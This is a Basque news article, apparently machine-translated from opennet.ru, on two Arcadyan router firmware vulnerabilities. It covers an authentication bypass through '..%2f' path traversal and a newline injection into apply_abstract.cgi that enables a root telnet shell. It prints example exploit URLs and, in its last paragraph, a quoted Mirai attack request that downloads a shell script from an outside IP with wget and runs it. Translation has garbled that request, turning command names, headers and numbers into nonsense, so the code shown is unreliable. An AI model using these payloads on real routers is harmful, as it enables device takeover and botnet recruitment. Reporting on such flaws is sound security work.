Sarean eraso masibo bat grabatu da Arcadyan konpainiaren HTTP zerbitzariaren inplementazioa erabiltzen duten firmware-ak etxeko bideratzaileen aurka. Gailuen kontrola lortzeko, erro-eskubideekin kode arbitrarioa urrunetik exekutatzeko aukera ematen duen bi ahultasunen konbinazioa erabiltzen da. Arazoak Arcadyan, ASUS eta Buffalo-ren ADSL bideratzaile sorta zabalari eragiten dio, baita Beeline markekin hornitutako gailuei ere (arazoa Smart Box Flash-en baieztatuta dago), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone eta beste telekomunikazio-operadore batzuk. Nabarmendu da arazoa Arcadyan firmwarean duela 10 urte baino gehiago egon eta denbora horretan 20 fabrikatzaile ezberdinetako 17 gailu modelotara migratzea lortu duela.
Lehen ahultasunak, CVE-2021-20090, autentifikaziorik gabe edozein web-interfazeko script atzitzea ahalbidetzen du. Ahultasunaren funtsa web-interfazean irudiak, CSS fitxategiak eta JavaScript script-ak bidaltzen dituzten direktorio batzuk autentifikaziorik gabe eskura daitezkeela da. Kasu honetan, autentifikaziorik gabeko sarbidea onartzen duten direktorioak hasierako maskara erabiliz egiaztatzen dira. "../" karaktereak zehaztea guraso-direktoriora joateko bideetan firmwareak blokeatzen du, baina "..%2f" konbinazioa erabiltzea saltatzen da. Horrela, "http://192.168.1.1/images/..%2findex.htm" bezalako eskaerak bidaltzean babestutako orrialdeak ireki daitezke.
Bigarren ahulguneak, CVE-2021-20091, erabiltzaile autentifikatu bati gailuaren sistemaren ezarpenetan aldaketak egiteko aukera ematen dio, bereziki formateatutako parametroak bidaliz apply_abstract.cgi script-era, parametroetan lerro berriko karaktererik dagoen egiaztatzen ez duena. . Adibidez, ping eragiketa bat egiterakoan, erasotzaileak "192.168.1.2%0AARC_SYS_TelnetdEnable=1" balioa zehaztu dezake IP helbidea egiaztatzen duen eremuan, eta scripta, /tmp/etc/config/ ezarpen fitxategia sortzean. .glbcfg, "AARC_SYS_TelnetdEnable=1" lerroa idatziko du bertan ", telnetd zerbitzaria aktibatzen duena, mugarik gabeko komando-shell sarbidea eskaintzen duena root eskubideekin. Era berean, AARC_SYS parametroa ezarrita, sistemako edozein kodea exekutatu dezakezu. Lehenengo ahultasunak script problematiko bat autentifikaziorik gabe exekutatzeko aukera ematen du, "/images/..%2fapply_abstract.cgi" gisa sartuz.
Ahultasunak ustiatzeko, erasotzaileak web interfazea exekutatzen ari den sareko atakara eskaera bat bidaltzeko gai izan behar du. Erasoaren hedapenaren dinamikaren arabera, operadore askok kanpoko saretik beren gailuetarako sarbidea uzten dute, laguntza-zerbitzuaren arazoen diagnostikoa errazteko. Interfazerako sarbidea barne sarera soilik mugatzen bada, kanpoko sare batetik erasoa egin daiteke "DNS rebinding" teknika erabiliz. Ahultasunak modu aktiboan erabiltzen ari dira jada bideratzaileak Mirai botnet-era konektatzeko: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Konexioa: itxi Erabiltzaile-agentea: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; kizkur+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Iturria: opennet.ru